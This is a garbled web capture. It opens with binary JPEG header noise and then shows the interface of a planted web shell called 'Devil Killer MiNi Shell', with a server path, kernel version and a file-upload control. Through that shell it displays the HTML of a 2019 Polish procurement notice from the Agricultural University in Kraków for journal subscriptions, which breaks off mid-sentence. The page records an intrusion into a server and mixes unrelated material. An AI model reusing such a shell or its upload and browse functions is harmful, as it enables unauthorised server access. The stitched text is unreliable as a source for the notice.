JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20191118/623485-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 623485-N-2019 z dnia 2019-11-18 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa w 2020 roku prenumeraty czasopism polskich i zagranicznych dla jednostek organizacyjnych Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">18150000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">al. Mickiewicza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">21</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">31-120</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kraków</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">126 624 413</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">dzp@ar.krakow.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">126 624 410</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://dzp.urk.edu.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">https://dzp.urk.edu.pl/index/site/4291</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Uczelnia publiczna</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://dzp.urk.edu.pl/index/site/4291</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://dzp.urk.edu.pl/index/site/4291</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie (wersja papierowa) w języku polskim - zgodnie z zapisami Specyfikacji Istotnych Warunków Zamówienia [SIWZ]</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie, al. Mickiewicza 21, 31-120 Kraków - Kancleria Uczelni (pok. nr 7)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa w 2020 roku prenumeraty czasopism polskich i zagranicznych dla jednostek organizacyjnych Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">DZP-291-3978/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest dostawa w 2020 roku prenumeraty czasopism polskich i zagranicznych dla jednostek organizacyjnych Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie. Niniejsze postępowanie zostało podzielone na trzy Pakiety:1)	Pakiet I. Dostawa naukowych czasopism zagranicznych, drukowanych do Biblioteki Głównej Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie.2)	Pakiet II. Dostawa (udostępnienie) naukowych czasopism zagranicznych w wersji on-line dla Biblioteki Głównej Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie. 3)	Pakiet III. Dostawa czasopism polskich dla jednostek organizacyjnych Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie. 2.	Zamawiający informuje, że każdy z pakietów wymienionych w pkt 1 został podzielony na poszczególne zadania częściowe. Zamawiający nie określa maksymalnej liczby części zamówienia, na które oferty częściowe może złożyć jeden Wykonawca. Oferty można składać w odniesieniu do wszystkich części (zadań częściowych w poszczególnych pakietach) 3.	Miejscami dostaw czasopism opisanych w Pakietach I, II i III są jednostki organizacyjne Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie: al. Mickiewicza 21 31-120 Kraków; al. Mickiewicza 24/28 30-059 Kraków; al. 29 Listopada 46 31-425 Kraków; al. 29 Listopada 54 31-425 Kraków; al. 29 Listopada 58 31-425 Kraków; ul. Balicka 116B 31-149 Kraków; ul. Balicka 122 31-149 Kraków; ul. Balicka 253A 30-198 Kraków; ul. Uniwersytecka 7 Prusy, gm. 32-010 Kocmyrzów.4.	Ilości czasopism i tytuły wykazane w formularzu cenowym, stanowiącym Załącznik nr 2.1 do niniejszej SIWZ, są wartościami szacunkowymi, które mogą ulec zmniejszeniu z przyczyn niezależnych od Zamawiającego, w związku, z czym Wykonawca otrzyma wynagrodzenie tylko za rzeczywiście dostarczone tytuły. Zmiany będą skutkować zmniejszeniem wynagrodzenia określonego w umowie. Z tego tytułu Wykonawcy nie przysługują żadne roszczenia finansowe lub prawne.5.	Faktury będą płatne w terminie 21 dni od daty dostarczenia prawidłowo wystawionych faktur do siedziby Zamawiającego, o czym więcej mowa w załączniku nr 1 do SIWZ tj. wzorach umów dla poszczególnych pakietów. 6.	Cena musi uwzględniać wszystkie koszty niezbędne do kompleksowego wykonania przedmiotu zamówienia w tym w szczególności:1)	koszt czasopisma;2)	koszt odprawy celnej (w przypadku czasopism zagranicznych w wersji drukowanej);3)	koszt dostawy czasopisma do siedziby zamawiającego;4)	koszt zabezpieczenia czasopisma przed uszkodzeniem w czasie transportu (np. foliowanie);5)	podatek VAT zgodny z przepisami obowiązującymi na dzień składania ofert;6)	bezpłatny dostęp do elektronicznej wersji on-line w przypadku czasopism drukowanych z ww. dostępem.7.	Wykonawca zagwarantuje, że ceny podane w ofercie nie ulegną zmianie przez cały okres trwania umowy. 8. Zamawiający zaleca, aby Wykonawca dołączył do Oferty wypełniony formularz cenowy (Załącznik nr 2.1 do SIWZ) w wersji elektronicznej (plik.xls), który będzie tożsamy z formą pisemną złożonego formularza cenowego. Formularz cenowy w postaci elektronicznej można złożyć zamawiającemu na płytce CD/DVD lub pendrive. UWAGA! Szczegółowy opis przedmiotu zamówienia (dla każdego pakietu osobno) został zamieszczony w Specyfikacji Istotnych Warunków Zamówienia [SIWZ], jak również w dołączonych do niej załącznikach (w szczególności we wzorach umów oraz formularzach cenowych) - wszystkie zamieszczone na stronie internetowej pod adresem: https://dzp.urk.edu.pl/index/site/4291. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">22200000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2020-01-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. Brak warunku w ww. zakresie. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. Brak warunku w ww. zakresie. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. Brak warunku w ww. zakresie. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Zgodnie z art. 26 ust. 2 ustawy Pzp, zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona (uplasowała się na pierwszym miejscu w rankingu złożonych i nieodrzuconych ofert) do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, następujących, aktualnych na dzień złożenia oświadczeń lub dokumentów, potwierdzających brak podstaw do wykluczenia, t.j:1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;2) oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;3) oświadczenie 